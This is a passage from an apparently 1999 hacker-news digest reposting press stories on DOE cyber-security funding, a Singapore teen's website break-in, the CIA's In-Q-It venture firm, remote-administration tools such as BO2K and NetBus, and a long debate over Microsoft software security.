Senate omits $35 million requested by the Department
of Energy for cyber Security. The $35 mil was to be
used for real time intrusion detection for 70 Energy
Department sites. Members of the Senate said they
want management reform first, then they will approve
funding.
Washington Post
http://www.washingtonpost.com/wp-srv/WPcap/1999-09/29/007r-092999-idx.html
DOE Loses $35 Million for Cyber Security
By Walter Pincus and Vernon Loeb
Washington Post Staff Writers
Wednesday, September 29, 1999; Page A18
The Senate yesterday passed an energy appropriations bill that omits $35
million requested by Energy Secretary Bill Richardson for increased
computer security. The money was eliminated despite months of heated
debate over suspected Chinese espionage, during which leading Republicans
accused the Clinton administration of foot-dragging on security.
Richardson, traveling overseas, issued a statement charging that Congress
was withholding "important tools needed to implement security reform" that
Congress itself had demanded.
Without the $35 million, Richardson said, "it will be impossible to provide
real-time cyber intrusion detection and protection for 70 Energy Department
sites."
The money was eliminated by a House-Senate conference reconciling
differences between the initial versions of the bill passed by the two
chambers. A member of the conference committee, who requested
anonymity, said the $35 million was eliminated because members "want to
see management reform" before they approve a huge funding increase.
The committee member noted that Richardson is developing a $450 million
cyber security proposal for fiscal 2001. It would include money to replace all
personal computers used in classified programs with machines that do not
have floppy disk drives, and thus cannot easily be downloaded.
Congress's action leaves the department with the $2 million it originally
sought for computer security before suspected Chinese espionage came to
dominate political debate in Washington last spring.
Cyber security, in particular, became a major concern after it was
discovered that the government's prime espionage suspect at the Los
Alamos National Laboratory, Chinese American physicist Wen Ho Lee, had
downloaded classified information to his unclassified computer. Lee, who
denies passing secrets to China, was fired but has not been charged with any
crime.
Meanwhile, the Energy Department's director of counterintelligence, Edward
J. Curran, acknowledged yesterday that he recommended his brother, a
retired police detective, for a $70-an-hour temporary job reviewing
counterintelligence operations at the department's three nuclear weapons
laboratories.
But he said the department's inspector general determined that his
recommendation did not violate federal conflict-of-interest statutes. "I
recommended my brother, yes, but he does not work directly for me,"
Curran said.
Michael Curran, a veteran of 27 years as a detective for the Waterfront
Commission of New York Harbor, has participated in a two-week
counterintelligence inspection at Lawrence Livermore Laboratory National
Laboratory in California and is now part of a nine-member team reviewing
security at the Los Alamos lab in New Mexico.
All told, he will work about six weeks this fall, Edward Curran said, and will
participate in additional counterintelligence inspections at Energy Department
facilities next year.
© Copyright 1999 The Washington Post Company
@HWA
24.0 California Proposes Email Eavesdropping Law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Simple Nomad
Currently most employers can read their employee's
email, with very few considering the privacy of their
employees. California Governor Gray Davis is considering
a bill that would require a company to have a written
policy regarding email eavesdropping before the
employer can actually read their employee's email.
San Francisco Examiner
http://199.97.97.16/contWriter/cnd7/1999/09/28/cndin/8639-0375-pat_nytimes.html
these guys have some funky shit html so i couldn't (easily) copy it here - Ed
@HWA
25.0 Singaporean Boy Sentenced to 12 Months
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by no0ne
12 months probation and 100 hours of community
service was the penalty imposed on a 15 year old boy
who electronically broke into the internet site of the
"Television Corporation of Singapore". The Myanmar
citizen is believed to be the first one to appear in a
Singaporean court for such an offense. The break-in
occurred last June when the boy saw a TV ad showing
the TV company's web site address and tried various
usernames and passwords in an effort to get into the
firm's server. He got in using "news" for both fields.
(Someone should punish the admin of the site as well
for having such crappy security.)
The Straits Times
http://straitstimes.asia1.com/cyb/cyb4_0929.html
SEP 29 1999
Teen sentenced for hacking into
TCS site
By KAREN WONG
A 15-YEAR-OLD boy was sentenced to 12 months'
probation and 100 hours of community service by the
Juvenile Court yesterday for hacking into the Television
Corporation of Singapore's (TCS) Internet site in June this
year.
The boy, who cannot be named, is believed to be the first
juvenile here to appear in court for such an offence.
His case came up on the same day The Straits Times
reported that another TCS website had been hacked into
early on Monday morning. The culprit in the second
hacking has not been caught yet.
District Judge Mark Tay Swee Keng stressed that the
court took a serious view of such cases. However, in
view of the boy's background -- he neither drinks alcohol,
smokes nor takes drugs, and also does not keep late hours
-- a bond would not be imposed on his parents.
His father is a product engineer and his mother is a
housewife. Both were in court yesterday. The judge did
not impose any curfew on the boy, who goes to a
neighbourhood school. He said the parents were already
ensuring that he got home by 6 pm.
The court heard that TCS had asked the boy to apologise
in writing and the apology has been posted on the TCS
site. Last month, the boy, a Myanmar national, had
pleaded guilty to four counts of unauthorised entry and
password disclosure.
The court had earlier heard that on June 15 this year, the
Secondary 2 boy was watching TV at home when he saw
an advertisement showing the address
www.mediacity.com.sg
He decided to visit the website and then tried various user
names and passwords to get into the Mediacity server.
He succeeded when he used "news" as the user name
and password. He then started exploring the directories
and files.
Then he told an 18-year-old youth whom he had met
chatting on the Internet, that the server had security
weaknesses and gave him the password. The older boy,
an O-level student in a private school, logged on too.
The younger boy then found a file containing all the
authorised user names and their corresponding encrypted
passwords. He passed them on to the older boy and both
used them.
The court heard that the younger boy only browsed
through the site. The older boy's case is pending.
Due to the hacking, TCS, which reported that some of its
pages had been replaced by pages containing obscene
words, had to shut the server down for about 10 hours.
About 80 man-hours went into restoring the site.
@HWA
26.0 CIA Funds Startup VC Firm
~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Weld Pond
Congress has appropriated $28 million to fund a venture
capitol firm with the name of 'In-Q-It'. The firm will use
the money to invest in small high-tech companies who
are working on promising technological projects that
could benefit the CIA. The new corporation will be
completely independent of the CIA and will be headed
by Gilman Louie, founder of Microprose and ex-executive
of Hasboro.
Nando Times
http://www.techserver.com/noframes/story/0,2294,500039359-500063830-500088357-0,00.html
Wired
http://www.wired.com/news/news/politics/story/22004.html
CIA sets up firm to invest in intelligence technologies
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press
From Time to Time: Nando's in-depth look at the 20th century
By TOM RAUM
WASHINGTON (September 29, 1999 12:09 p.m. EDT http://www.nandotimes.com) - The CIA, not wanting to miss the boat on the Internet age or be outsmarted
by tech-savvy adversaries, is teaming up with Silicon Valley entrepreneurs to invest in companies developing computer technologies that could help with
intelligence gathering.
Forgoing its usual clandestine ways, the agency has set up its own venture capital firm - with money appropriated by Congress - with offices in
Washington and Palo Alto, Calif. It will invest in promising new start-up hi-tech companies.
The CIA picked a fanciful name for the new company: In-Q-It. The "In" stands for intelligence. The "It" stands for information technology. And the Q?
That's the code name of the James Bond character who comes up with all the gadgets that the fictional British spy uses.
"We do have a sense of humor," Central Intelligence Agency spokesman Bill Harlow said Wednesday, confirming the existence of the new company.
Harlow said the venture capital company "is clearly tied to us, but they make a big point of being independent."
The venture, first reported by The Washington Post and The New York Times in Wednesday's editions, was actually set up last February as a nonprofit
organization.
But it is just now getting organized, with its own board of directors, according to the new chief executive officer, Gilman Louie.
Louie said in an interview that the company would be small, with about 20 to 25 employees, and is being started with $28 million appropriated by
Congress last year as part of the classified budget for the agency.
Both Louie and the CIA said the venture capital company would only work on unclassified projects.
Mainly, In-Q-It will invest in some high-tech companies and form joint ventures with other ones where the companies are working on promising
technological projects that could benefit the CIA.
This includes ways of helping the CIA to use the Internet more effectively and securely.
It also will try to find promising technologies that will help the CIA better use the information it already possesses in a variety of forms, from paper to
computer files.
He cited the May 7 bombing of the Chinese embassy in Yugoslavia - a target picked by the CIA - as "the manifestation of the worst result that could
happen if you don't have all your information lined up."
Louie, 39, founded his own electronic game company - MicroProse Inc. - that was later bought by Hasbro. At Hasbro, Louie has been an executive with
the toy company's online business group.
He said he has no experience in espionage "and I want to keep it that way."
The company's board of directors includes John Seely Brown, director of the Xerox Corporation's Palo Alto Research Center; Norm Augustine, chairman
of Lockheed Martin; William Perry, the former defense secretary; and Jeong Kim of Lucent.
Wired;
Valley VCs to CIA: 'Huh?'
by James Glave
12:30 p.m. 29.Sep.99.PDT
The CIA's new venture capital project isn't going to come up with anything that the free market won't do on its own.
That's the opinion of venture capitalists and policy watchers, some of whom lampooned a new effort to develop spy technology in the heart of
regulation-wary Silicon Valley.
"I am not familiar with what it costs to create those exploding pens," Benchmark Capital general partner Kevin Harvey said.
The New York Times reported Wednesday that the new, non-profit VC company, In-Q-It, will be bankrolled with US$28 million appropriated for the
spy agency's budget. There is already one office in Washington, with another planned for Northern California.
But the tech venture capital community said that the plan is right out of a movie.
"That's R and D that is pretty far afield from what we do here," Harvey said, adding that government involvement in venture capital is "not a great
idea."
In-Q-It CEO Gilman Louie, a veteran of the computer game and toy industry, told the newspaper that the new company is designed to move
information technology to the agency more quickly than traditional government procurement processes allow.
Neither Louie nor the CIA could be reached for comment. Meanwhile, VCs and policy watchers scoffed at the arrangement.
"It looks pretty outrageous when we have healthy capital markets and one of the most innovative technology sectors in the world," Erick
Gustafson, technology policy director at the free-market focused Citizens For a Sound Economy, said.
"If you have $28 million, do you put it in using the CIA as the manager, or do you use private existing means of research? The existing means of
research would prove more efficient," Gustafson said.
The CIA's new company aims to cut through the sluggish technology procurement process by directly funding companies that are creating new
innovations in the fields of privacy and security.
But one VC said that the agency should stick to the current scheme of contracting out for products.
"It seems like they would only add layers to [the procurement bureaucracy]," said Gregory Barr of Fleet Equity Partners.
"It doesn't seem to make a lot of sense," he said, adding that the arrangements could set up all manner of conflicts of interest between investor
and developer.
Barr said that Louie, who has already left his position as a Hasbro executive, may not have been the best choice for the job.
"If you are looking for a successful VC, I am not sure someone from a toy company is the best person. [Louie] is someone from the product side,
not the investment side," he said.
Andrew Anker, a partner with August Capital, described the project as interesting but misdirected.
"There is a huge glut of money out there," Anker said. "And there are a lot of ideas out there. The question is more, 'What does the marketplace
want?'"
"Say the CIA said that wrist phones are critical for our agents and we will buy 10,000 of them. As long as there is a consumer market for it, a
bunch of entrepreneurs will go down to Sand Hill Road and seek financing to get it."
@HWA
27.0 BO2K, NetBus, and now WinWhatWhere
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Weld Pond
So what exactly are the features of a remote admin tool
that cause it to be labeled as malicious by AntiVirus
vendors? WinWhatWhere, which was actually built to
spy on people, avoids this hapless moniker while
commercial software such as NetBus and freeware such
as BO2K get branded as evil malicious code. What the
hell is going on here?
ZD Net
http://www.zdnet.com/zdnn/stories/comment/0,5859,2343782,00.html
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
A bevy of Backdoor bad boys
By Kevin Poulsen, ZDTV
September 29, 1999 10:29 AM PT
URL: http://www.zdnet.com/zdnn/stories/comment/0,5859,2343782,00.html
Before flying to DC to cover InfowarCon '99 last month, I took a few minutes to download the
dread Back Orifice 2000, and then actually installed the malevolent masterpiece of cyberhorror on
my home PC, blatantly ignoring the advice of various security advisories and my antivirus software.
As you probably know by now, Back Orifice 2000-- BO2K to its friends -- is an evil program that
cyberterrorists can use to take complete control of your computer. They can read your email, wipe
out your hard drive, or send your mouse cursor careening around your screen like the planchette on
a demon-haunted Ouija board.
Villains can send the program as an email attachment to their enemies-- perhaps disguised as an
electronic greeting card or a game. If the hapless victim opens the attachment, all is lost.
But there's another side to BO2K. If you're a network administrator, the program is well suited for
maintaining the computers on your network. If you're the family computer expert, you can send it to
your parents and use it to fix whatever minor Windows problems are vexing them this week. If
you're leaving town, you can install in on your own machine and use it to check in on your PC:
transfer a file that you forgot to bring with you, or capture frames from your Netcam and watch the
people burglarizing your apartment.
In short, BO2K is actually a useful and free remote administration tool. The program gained its dark
image primarily from the showmanship of its creators: the cyberspace bad boys (and gal) known
collectively as "The Cult of the Dead Cow." They released BO2K, not in a dry corporate environ,
but in a flashy concert-like venue at the DefCon hacker convention. And the rock stars of the
underground taunt Microsoft and antivirus companies at every turn.
Meanwhile, another "evil" program is struggling to become mainstream. NetBus was created last
year by Swedish programmer Carl Fredrik Neikter, and it was originally designed for mischievous
fun-- install it on a friend's machine and watch his amazement via his Netcam while you remotely
open and close his CD-ROM tray. It became an underground hit even before the original Back
Orifice made its high-profile appearance.
But Neikter never wanted to be a rebel. Now, partnered with UltraAccess Networks, he's
marketing a new version of his program as commercial shareware, and struggling to shake the
underground image.
Sadly, even charging for the software- a sure sign of legitimacy- hasn't completely removed the
cyberpunk taint from NetBus's reputation. Virtually all the major antivirus software makers- some of
whom sell their own remote administration tools-- treat the $15 program as a malicious code, a
practice UltraAccess founder Judd Spence calls anticompetitive.
"Basically," said Spence, "we're probably going to have to take everyone to court."
Last March, NetBus scored a prestigious "five cow" rating from TUCOWS, only to be yanked from
the software distributor's website a few days later after complaints came in about their distribution of
malicious code.
Oddly enough, software intended for genuinely evil purposes doesn't seem to be as controversial.
Earlier this month, a company called WinWhatWhere released version 2.0 of its Investigator
software, a program specifically designed to spy on hapless PC users. It can record every keystroke
a user types and, according to the company's press release, includes "an optional Silent Install utility
for [sic] discrete deployment."
How has Investigator eluded the dire warnings and countermeasures that accompany Back Orifice
and NetBus? It is targeted specifically to companies who want to spy on their employees. It seems
that's something that just doesn't warrant a security advisory.
@HWA
28.0 Microsoft, Insecure or Just More Prevalent?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Elinor
With the recent holes found in IE, Hotmail, NT, Office
and other Microsoft products many people think that
Microsoft just writes insecure code. Microsoft says that
their code is no worse than anyone else's but that what
they write is looked at by a lot more people. (This
article gives a good overview of a lot of the technical
hurdles Microsoft faces.)
CNN
http://www.cnn.com/TECH/computing/9909/28/ms.security.idg/index.html
Microsoft: Bad security, or bad
press?
September 28, 1999
Web posted at: 12:12 p.m. EDT (1612 GMT)
by Elinor Mills Abreu
From...
(IDG) -- Microsoft has been getting a lot
of bad press lately over security
vulnerabilities in Internet Explorer,
Office and Hotmail, among other
software. Security concerns with
Windows NT even prompted the U.S.
Army to move its hacked Web site from
NT servers to WebStar servers running
the MacOS.
But does this mean Microsoft software is less secure than other software?
A variety of experts think so, claiming the software giant is offering more
functionality at the expense of security. Microsoft defends its strategy, saying
users want ease-of-use and more features.
And several users said they approve of that strategy. In the end, it's up to
users to let the company know whether they are happy with the trade-off or if
they want defaults to be set for greater security and more hand-holding.
Another option users have is to switch software
like the Army did. The Army cited the fact that
the MacOS doesn't have support for remote
logons or a command shell to provide remote
access via a DOS prompt.
Scott Culp, security product manager for NT
Server, says NT provides tools to disable remote logons and that nearly all
Unix systems have a command shell. "Whether or not an operating system has
a remote command shell says nothing about its ability to withstand other
attacks such as denial of service attacks."
Microsoft software experiences the same types of security woes other
platforms do but its troubles are more prominent because more people are
using Microsoft products than products from other software vendors, Culp
says.
Without question, Microsoft's dominance in the operating system market plays
a big part in the headlines - the sheer number of users of the software makes
it an easy and huge target for hackers, increases the chances that security
flaws will be discovered and heightens the impact from spreading viruses.
Hegemony not the only issue
But numerous experts, analysts and hackers
say Microsoft's hegemony isn't the only
problem.
"They certainly don't have a very secure
environment. There are so many holes in the
Microsoft environment that any [worthy]
hacker ... is going to figure out how to break
in," says Anne Thomas, a senior analyst at the
Patricia Seybold Group in Boston.
"It's the dominant operating system out there,
so it's going to attract the attention. On the
other hand, Windows has extremely sloppy
security," says Bruce Schneier, author of
Applied Cryptography and a founder and
chief technology officer of Counterpane
Internet Security, a provider of managed
security services in Minneapolis, Minn.
What often upsets people is that Microsoft
hasn't learned from the mistakes made in
older operating systems, notes Jon McCown,
technical director of network security at the
International Computer Security Association
in Reston, Va. Categories of attack that are
well understood are cropping up in Windows.
"They're doing a forthright job of addressing
them, but there's a concern about what we
don't know about yet; what's still in the operting system or in the servers that
will become an issue."
Evolution of Windows
It has been suggested that Microsoft's security weakness have to do with the
evolution of Windows from a single-user desktop operating system to a
multiuser operating system.
Windows is desktop software that "was never really intended as network
architecture," says Jeff Tarter, editor and publisher of Softletter, based in
Watertown, Mass. However, Microsoft is rewriting a lot of the code for
Windows 2000, as it did for NT, which should help make it more secure, he
adds.
Culp acknowledges that the NT security architecture is more "robust" than its
predecessors.
"NT is an entirely different animal altogether," he says. "It was built from the
ground up with a brand new architecture ... to be used as an enterprise class
operating system with security as a primary requirement." But Culp also
defended the strength of all Windows in general, saying security was "woven"
into the operating rather than "bolted on" afterward.
Others are skeptical
"Microsoft's operating system was never designed with security in mind,"
Schneier says. "For Microsoft, security is always an afterthought."
One example is Microsoft's implementation of file-sharing networking services
in Windows 95 and 98, says Tweety Fish, a member of the hacker group Cult
of the Dead Cow. Where previous versions of Windows weren't designed for
networked computers, Microsoft made TCP/IP file sharing the default on
Windows 95 and 98 without explaining the consequences of sharing files over
the Internet to users who weren't savvy about network security, he wrote in
an e-mail response to questions. Microsoft could have also used a more
secure method for file sharing.
Trade-off: Security vs. functionality
Factors listed by experts interviewed over the past few weeks that lead to
security problems for Microsoft include:
-- The company's reliance on the Component Object Model specification for
running application components on multiple platforms, specifically ActiveX
controls, which are reusable component program objects similar to Java
applets and which can be attached to an e-mail or downloaded from a Web
site. The most dangerous are pre-installed ActiveX controls which contain
functions that can be executed on a computer but run without digital signatures
used by other ActiveX controls.
-- NT's "insecure" default installation, which assumes the user or network
administrator will be knowledgeable enough to change the settings to a higher
security level.
-- The company's use of executable code in data files in Microsoft Office
products, primarily macros, which are saved commands that can be recalled
with a single command or keystroke.
-- The company's tight integration of its applications with its operating system,
and lack of tight administration control in the operating system over privileges
and access controls, which allow applications and macros to execute other
programs.
-- The company's use of hidden and/or undocumented APIs or features that
can give hackers back doors into Microsoft applications and which don't get
the scrutiny of code made public to developers.
-- The company's faulty implementation of the Point-to-Point Tunneling
Protocol, which enables the extension of corporate networks through private
"tunnels" over the Internet. It is still vulnerable to "offline password-guessing
attacks from hacker tools such as L0phtcrack," according to Schneier's report
at http://www.counterpane.com/pptp.html.
In general, the experts agreed that these technologies provide greater ease of
use and functionality to users but say they also open the system up to security
vulnerabilities. Microsoft counters that many of the features can be either
disabled, like macros and ActiveX controls, or made more secure with the use
of third-party specialized software.
COM opens the door
Thomas of the Patricia Seybold Group says Microsoft's main problem has to
do with COM, which "opens the system up to all kinds of nasty, dangerous
situations." COM's integration with Microsoft Word allowed the prolific
Melissa virus to spread so quickly in March, she says.
"It's a hard trade-off," Thomas says. "You can do without this incredibly
powerful technology that makes your system so much more automatic, or you
can shut off that automatic capability and not have that tight integration, but
have protection against viruses."
Java applets are designed to minimize security violations by being executed in
a "sandbox" - a secure area of the computer that isolates Java applets and
keeps them from damaging files - whereas ActiveX controls rely on the applet
being signed by the creator, whom the user will, ideally, know and trust.
Dangers of ActiveX
Allowing remote systems to run arbitrary code on a local system is a "massive
security risk," hacker Tweety Fish wrote. "It's been proven time and time
again that Microsoft's implementation of ActiveX can be broken pretty easily
..."
ActiveX controls can be automatically launched when a user goes to an
HTML page or clicks on an e-mail attachment. They can be used to do
malicious things like run programs on a user's computer, read system files and
create files, among other things, according to Richard M. Smith, a security
expert and president of Phar Lap Software, a Cambridge, Mass. company that
makes real-time operating systems for embedded systems.
"I don't think anybody right now, frankly, has a handle on the scope of the
[ActiveX] problem," Smith says. " ActiveX really opens up a can of worms."
Microsoft has released an average of about two to three security patches a
month over the past year, Smith says, adding that he suspects that most
Microsoft users have not downloaded them. Within the past year, while
Microsoft has had about 10 separate bugs in IE that enable code in messages
to read files, Netscape has had one, according to Smith.
Default "open" or "closed"
Microsoft's Culp argued that COM does not pose a security risk, and
countered that Microsoft allows users to configure their software to give them
the balance of functionality and security.
For instance, users can disable macros and ActiveX controls, and a new
security patch for Office lets users decide whether to allow Office documents
to launch automatically when they're hosted on Web sites, he says. In addition,
a new security configuration tool kit that ships with Windows 2000 will allow
users to customize their software to the security level they desire, Culp says.
"We don't force anybody into a particular stance," he says. "We provide tools
to allow you to make that decision."
But several experts say Microsoft should ship its software in the highest
security mode rather than a more risky "open" default.
"The operating system should be fail safe enough [especially on a server
operating system like NT] that a nonadministrator user has to work pretty hard
to allow the machine to be compromised," hacker Tweety Fish wrote. "The
fact that macros in Microsoft Word can run any DOS executable and access
any system function is a massive security hole, and for Microsoft to claim
anything else is specious marketing spin."
Users can't make knowledgeable choices of what features to disable if they
don't fully understand the dangers involved, Tweety Fish says. Instead, they
should feel confident that their software is secure and as they start to
understand the risks they can modify the security themselves.
Eric Schultz, director of Microsoft Content for Security-Focus, which operates
a portal site at http://www.securityfocus.com, specifically complained that
Windows NT's default installation can allow hackers to get a lot of
information, including access to "blank administrator passwords, disabled
security policies, and weak permissions over critical system files."
But Microsoft can't be expected to make the security decisions for its users,
particularly when opting for greater security for some users at the expense of
less functionality for others, Culp argues.
"There's always a trade-off between convenience and security," he says.
"Everybody has a proper point where they balance security against usability.
Any two people are going to have a different point that's right for them."
Virtually all general-purpose operating systems default to usability over
security rather than in a "locked down" mode.
Russ Cooper, editor of the NT Bugtraq mailing list
(www.securityadvice.com), defended macros. "Although relatively insecure,
[macros are] still very much in demand. ... Internet technologies are not
designed to be secure. They're designed to be interactive."
Cooper says users should be more responsible. "Microsoft is providing us with
tools that will help us, but at the same time we as consumers are not taking the
responsibility ... to learn basics about using this stuff," he says.
But other experts argue that Microsoft has a responsibility to provide greater
user safety than it is now, even if it might take more time and money to
develop products that are more secure.
"In the car industry they have to build with safety in mind. Car makers couldn't
get away with this," said Avi Rubin, a principal member of the technical staff
at AT&T Labs in Florham Park, N.J., and author of The Web Security
Sourcebook. "They're more concerned with the bottom line and profits, and
that's upsetting."
"Setting the default to dangerous doesn't work in any other industry," Schneier
says of Counterpane.
Business decision
Offering zero-administration capabilities and features that, in their default
mode, reduce the level of security in the software, is a strategic decision on
Microsoft's part, the experts say.
Phar Lap's Smith questioned the need for some of the features Microsoft
provides at the expense of security, saying he'd like to turn them off but
doesn't always get that option.
To simplify things for the administrator, Microsoft is promoting ease-of-use
over "robustness of control," hacker Tweety Fish says. However, if the
operating system doesn't adequately handle the behind-the-scenes work,
security holes can be opened up without the administrator's awareness.
"Unix variants have a long way to go to match the ease of use of NT, but on
the other hand, with a little bit of knowledge [in Unix], you can know
EXACTLY what your machine is doing, which is the most important aspect of
server administration," Tweety Fish wrote.
Meanwhile, Schultze of Security-Focus predicted that security problems with
NT and its predecessors will pale in comparison to security issues that will
arise with Windows 2000, which will offer more complexity to secure. "There
will be more opportunities for things to go wrong," he says.
For instance, Schultze says Windows 2000 defaults to enabling a host of
encryption authentication schemes, including LanMan, which he says is easy
to decrypt, and users have to go in and disable any schemes they don't want to
use. However, the chances that an administrator won't tighten the system
down are great.
Culp disputes this, noting that in Windows 2000 Microsoft is using security
standards like the Kerberos protocol, putting the software to heavy testing
including specific attempts to break into it, and has been beta testing it for two
years.
Tight integration, loose administration, hidden APIs
Microsoft prides itself on the tight integration of its applications with its
operating system - a matter that sparked an antitrust lawsuit by the U.S.
government. But while this integration lets users easily work between the
programs, it also makes it easy for flaws in one application to affect the entire
system, according to Rubin at AT&T.
"There are no security perimeters around any of the applications," he says.
"The fact that Word macros can access an Excel database and Excel files can
launch other programs with a 'call function'" in Outlook, for example, creates a
hacker-friendly environment.
Part of the problem is Microsoft's use of so-called hidden APIs, which are
kept secret from third-party developers, Rubin says. These allow Microsoft
developers to take shortcuts but can also lead to security problems because
they aren't scrutinized as public ones are.
Hacker Tweety Fish accuses Microsoft of historically implementing "horribly
insecure" APIs.
"Both Back Orifice and BO2K were built using standard Microsoft APIs;
every piece of scary, worrisome functionality is BUILT IN to Microsoft
Windows," he wrote. "If these APIs were open to public scrutiny, I doubt such
terrible ideas as WNetEnumCachedPasswords [which cheerfully reveals all
cached passwords on the system] would exist."
Microsoft's Culp couldn't categorically deny that the company uses hidden
APIs, but in general he argued that integration is necessary to give advanced
products to users.
"Microsoft doesn't believe that the way to provide security is to make our
applications incompatible with each other," he says. "That's not what our
customers want. They want seamless integration."
Tightly integrated applications provide productivity improvements and can still
be secured, Culp says. For example, Office 2000 macros can be disabled or
allowed to run: automatically, only when digitally signed, or only when signed
from trusted sources.
PR treatment
Technical debates aside, most of the critics complained that Microsoft often
treats security issues like PR problems that need to be averted and not
resolved.
The main security problem is "marketing driven product design at Microsoft,
and the fact that they will not consider any given security risk a problem until it
becomes a problem in the press," hacker Tweety Fish says.
He and others complained that Microsoft often denies security problems
before being forced to address them with a fix after they are made public, and
that the company tries to minimize their scope and put a spin on them.
For instance, the company downplayed the Jet/ODBC [open database
connectivity] exploit in a Microsoft Security Bulletin over a year ago so that
"almost nobody" bothered to install the patch and users were caught off-guard
when it made headlines recently, the hacker says.
The company downplays the extent of a problem by not mentioning all the
situations in which it could arise, saying it is limited to only specific situations
and claiming that no customers have been affected, the experts say. For
instance, when issuing alerts about browser bugs Microsoft usually doesn't
point out that they can occur in e-mail, Smith says.
But Smith and some of the others conceded that Microsoft's response time
has improved in the past few years. For example, Microsoft released a
workaround immediately and a patch four days later for a recent security
exploit in Internet Information Server, and "that's probably as responsive as
any company would be," McCown says.
"A quick fix may break something else," Schultze of Security-Focus says.
"They're being thorough. It may not be as quick as some people might like."
Smith says he could think of two or three problems Microsoft decided not to
fix because of disagreement on their seriousness. For instance, he says it took
Microsoft a year to change its mind and admit that it is not secure to have a
Word document embedded in an e-mail or a Web page be able to start up the
Word application. In addition, Microsoft still maintains that JavaScript
executables in e-mail shouldn't be disabled by default.
Culp denied the allegations that the company is reluctant to admit exploits or
their scope. The company's security response team is quick to address and fix
problems, monitors security mailing lists for reports and works closely with
security groups, he said.
When a vulnerability is confirmed, the company sends e-mail alerts to
customers who have asked to be put on a list at secure@microsoft.com and
others, and posts information on its security Web site at
www.microsoft.com/support and
www.microsoft.com/security/services/bulletin.asp, Culp said. Microsoft has
more than 200 full-time employees working on nothing but security, he added.
"We look into every issue that's reported," he said. "Out of those 10,000
queries and reports (received in the past year) and all the things posted to the
mailing lists, etc. there have been about 30 issues that we have needed to
provide a patch for this year," and 40 or 45 over the last 12 months, Culp said.
Only about 5 percent of the reports Microsoft gets turn out to be bonafide
security vulnerabilities, according to Culp. Many end up being problems due to
unclear documentation, incorrect implementations of the software or code, or
users not following best practices, he said.
In recent swift work, Microsoft released a security bulletin just hours after an
IE vulnerability was announced September 10, telling users how to protect
against it while a patch is developed, Culp noted.
Meanwhile, Microsoft has taken a new approach and put a Windows 2000
test server online for users to try to hack. The system has held up although it
got off to a rocky start and was down for several days after lightning hit a
router right after it was put online.
Cooper of NTBugtraq predicted that the security situation will improve for
Microsoft as consumers become more savvy and demand more security in
products.
"Certainly there's been a change in Microsoft in the last two years to do things
with far more security in mind," he said. "The reality is they're doing it to an
extent that consumers will tolerate and to an extent that consumers will
demand."
Users are content
Several users said they have no complaints with Microsoft's products or
attitude.
"From my perspective, what Microsoft is doing is right on target," said Greg
Scott, IS manager at Oregon State University's College of Business in
Corvalis.
"I want the interoperability the tools provide me so I can move things cleanly,
simply and easily between systems. And I'm willing to suffer the minor
inconvenience of having to pay more attention to security and patches," he
said. "As long as they provide patches and fixes in an appropriate timeframe,
then I'll use their products."
Another user said he likes Microsoft software specifically because of its
integration. Ty Simone, IS manager at Onsite Sycom Energy Corp., an energy
service company based in Carlsbad, California, said he's not bothered by
Microsoft's usability versus security tradeoff.
"I would much rather have the control here than have Microsoft saying 'You
can't do anything until you change something,'" he said. "For example, the
default for IE is medium. If they set it to high, until I get to that user and set it
to medium that user couldn't access the corporate intranet, much less the
Internet."
Simone also praised Microsoft for reacting swiftly and forthrightly when issues
arise, noting that Unix users don't get security bulletins e-mailed to them like
Windows users do.
Unix gets more hacks but less press than NT does, Simone says, adding that
"It's not popular to bash the little guy."
Unix, Linux, MacOS
So how do the Windows alternatives fare?
The MacOSX "add-on programs look to be just as vulnerable (as Windows) --
there are permissions problems and plenty of coding issues," Dr. Mudge of
Boston-based hacker group L0pht Heavy Industries wrote in an e-mail.
"However, a quick look would imply that the core OS might be much more
secure than NT's core components. This is most likely due to the fact that the
new MacOS's are really BSD 4.4 (Unix) and mach memory systems. Both
have been around for decades to have the kinks worked out of."
Meanwhile, open source operating systems tend to be more easily secured
than closed source ones like NT, "because there are more people doing more
work to find the holes, and it's easier for researchers to develop patches for
exploits they find," hacker Tweety Fish said.
The most secure platform "out-of-the-box" is OpenBSD because security is a
focus on the project, he said. "It is not perfect; no OS is, but with OpenBSD
you can guarantee that security is their first priority."
The favored underdog, Linux, is considered experimental at this point, but it
may end up giving NT a good run for its money, according to Winn
Schwartau, founder of Security Experts consultancy in St. Petersburg, Florida,
and author of "Information Warfare" and other books. Most of his clients, who
include governments, NATO and other multinational organizations, use Unix
now, he added.
Despite the complaints about the security in Microsoft software, Culp said
customers-including government agencies and organizations in the healthcare,
insurance and banking industries-feel comfortable using the company's
products.
And Cooper of NT Bugtraq noted that Windows is "hugely accepted, widely
deployed and largely liked" by users.
"I don't think Windows is more or less secure than some other operating
system," Cooper said. "I think that there are technologies from Microsoft that
are good; there are others that are not good; and there are others that still
need to be refined and improved, but that are still very much in demand."
But hacker Space Rogue, a member of the L0pht Heavy Industries, summed
up what he and others see as Microsoft's security challenges.
"Windows has three strikes against it, as I see it. Popular OS, weak security,
easy-to-use, oh, and it is made by MS, the company everyone loves to hate."
@HWA
29.0 Darktide Hacking Is Closed
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Outkast
After almost 2 years Darktide Hacking has closed its
doors. The site offered underground news, newbie help
guides, Linux documentation and more. They will be
missed. Outkast, the sites web master, hopes to open a
new site with a different focus soon.
Darktide Hacking
http://www.darktide.com
From the site;
The time has come for me to close down Darktide as we know it. Darktide was a blast to run,
but the time has come for me and my crew to start making a income on the Internet. I need to
have a real income, just like all you. I could have made money with Darktide , but I will not
sell-out. I will not turn Darktide into the next AntiOnline Network. I don't want to make money
off of hacking, I have to much respect for you, the hackers, for the underground.
Darktide will be turning into a netcenter. Access to (but not limited to) many search
engines, free web-based E-mail, news, and documentation. We will still have information on
Linux, encryption, and programming (and more). We will still have everything that is on
